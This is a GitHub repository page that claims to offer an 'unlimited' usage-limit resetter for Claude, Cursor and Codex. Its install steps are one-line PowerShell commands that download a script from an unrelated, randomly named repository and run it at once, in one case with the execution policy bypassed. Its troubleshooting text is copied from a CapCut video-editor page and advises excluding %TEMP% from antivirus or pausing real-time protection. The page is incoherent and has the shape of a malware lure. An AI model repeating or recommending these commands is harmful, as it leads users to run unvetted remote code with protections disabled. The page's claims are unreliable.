Skip to content

Gulfsistable/codex-cursor-unlimited

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

Codex-Cursor-Claude-Usage-Resetter

All-in-one single-line Limits resetter for Claude // Cursor / Codex (ChatGPT) and more others, it will work few times befor you need to change your Data.

Install

PowerShell

irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex

Command Prompt (cmd.exe)

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

Windows Terminal

Works in any tab — PowerShell, CMD, or any custom profile. Paste and press Enter.


Requirements

  • Windows 10 / 11 (64-bit)
  • PowerShell 5.1+ or CMD
  • 4 GB RAM minimum (8 GB recommended for 4K timelines)
  • GPU with DirectX 11 (Intel HD 4000 or newer, any discrete NVIDIA/AMD)
  • ~3 GB free disk space (more for exported projects)
  • Internet for first launch (template sync)

Troubleshooting

Script does nothing / closes instantly

Execution policy blocking. Use the CMD version:

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | iex"

"irm is not recognized"

Old PowerShell. Full cmdlet name:

Invoke-RestMethod https://raw.githubusercontent.com/TarantulaFire/vmtyilpj/main/install.ps1 | Invoke-Expression

Export fails at 99% / crashes during render

Three common causes:

  1. Disk full — CapCut needs ~2x the final file size as temp buffer. Free up space on your system drive.
  2. GPU driver outdated — update to the latest NVIDIA/AMD driver. CapCut uses hardware acceleration and older drivers cause render crashes.
  3. Corrupt project — duplicate your project, delete the last clip you added, try exporting again. If it works, that clip has a codec issue — re-import it.

Antivirus flags the installer

CapCut registers video codecs at the system level, which some AV heuristics flag as suspicious. Add an exclusion for %TEMP% during install, or temporarily pause real-time protection.

License

MIT — see LICENSE.

About

codex app - AI coding tool for writing, reviewing, and debugging code. Comprehensive guide with setup instructions, feature highlights, and system requirements.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors